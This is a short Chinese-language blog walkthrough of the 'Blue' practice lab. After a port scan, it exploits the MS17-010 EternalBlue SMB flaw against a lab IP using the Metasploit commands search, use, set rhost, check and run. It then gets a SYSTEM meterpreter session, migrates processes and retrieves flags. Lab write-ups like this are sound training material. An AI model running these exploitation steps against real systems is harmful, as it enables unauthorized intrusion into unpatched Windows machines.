Blue靶场实践


阅读须知:

探索者安全团队技术文章仅供参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作,由于传播、利用本公众号所提供的技术和信息而造成的任何直接或者间接的后果及损失,均由使用者
本人负责,作者不为此承担任何责任,如有侵权烦请告知,我们会立即删除并致歉,创作不易转载请标明出处.感谢!

师傅: K1t0 https://k1t0111.github.io

信息收集

今天来打一打简单靶场 ……

循例 对机器进行扫描 鉴于很简单 直接快点带过

直接扫描tcp

开放 445 和 135 139 端口 直接一看 445 就可能使永恒之蓝 并且给出很可能就是win7 -win10

不说别的 最好的 直接上 msf 直接先看一遍 是不是永恒之蓝

exploit

话不多说 msfconsole

直接搜一下 search ms17-010 看到出现四个模块 路径

直接用 use exploit/windows/smb/ms17_010_eternalblue

设置一下 set rhost 10.10.225.254

废话不多说直接上图


先check 看看究竟是不是这个漏洞

结果正确易受攻击

直接run 开打获取meterpreter

successful !!!

PS: 其实这个靶场中还涉及了 可以将shell 转化成 meterpreter

shell_to_meterpreter

同时可以用ps 命令查看进程 可以将我们的meterpreter移交到另一个进程中通过migrate

post

其实已经打完了

已经是system 没什么好说的 直接在根目录找到 flag1.txt
其他的flag 分别在 用户等常规地方找吧…..

总结

基础……….


文章作者: K1T0
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 K1T0 !
  目录